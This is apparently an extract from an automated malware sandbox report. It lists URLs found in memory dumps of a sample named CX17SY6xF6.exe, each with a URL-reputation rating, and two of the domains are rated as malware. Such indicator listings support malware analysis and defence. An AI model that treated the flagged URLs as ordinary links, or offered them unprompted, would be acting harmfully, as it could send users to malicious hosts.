                                                                                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/industrijske-tablice-telefoni-handheld/industrijski-skenerjiCX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      https://www.elpro.si/kategorija-izdelka/merilniki-vlage/rotronic-vlaga-aktivnost-vode-dew-point-moniCX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                                      http://www.com-sit.com/wp-content/plugins/elementor/assets/css/widget-icon-list.min.cssCX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://www.aevga.com/CX17SY6xF6.exe, 00000000.00000003.583387264.0000000007360000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585500794.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/termometri-dataloggerji-ex/termometri/alkoholni-termometri/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.myropcb.com/services-capabilities/pcb-restoration/CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://www.pcgrate.com/wp-content/plugins/pro-elements/assets/js/frontend.min.js?ver=3.3.1CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        https://www.elpro.si/kategorija-izdelka/merilniki-tlaka/tlacni-vmesniki/CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                                                                        unknown
                                                                                                                                                                                                                                        http://chart.apis.google.com/chart?chs=100x100&cht=qr&chld=LCX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.681114888.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.648512272.00000000071FB000.00000004.00000020.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://gmpg.org/xfn/11CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://www.cloudflare.com/5xx-error-landingCX17SY6xF6.exe, 00000000.00000003.581132870.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.579192440.00000000039B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              http://www.myropcb.com/services-capabilities/stencil/CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.744273277.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595947811.0000000007260000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              http://www.valselit.com/177-appartement-a-vendre-sigean-30378CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                                                                                              unknown
                                                                                                                                                                                                                                              https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-brands-400.woff2CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                http://www.pwd.org/hCX17SY6xF6.exe, 00000000.00000002.888204578.00000000071D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://hotel-amadeus-frankfurt.de/js/jQuery/jquery-1.9.1.min.jsCX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                                                http://hotel-amadeus-frankfurt.de/modules/contentDisplay/contentDisplay.mod.cssCX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.639995551.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                                                unknown
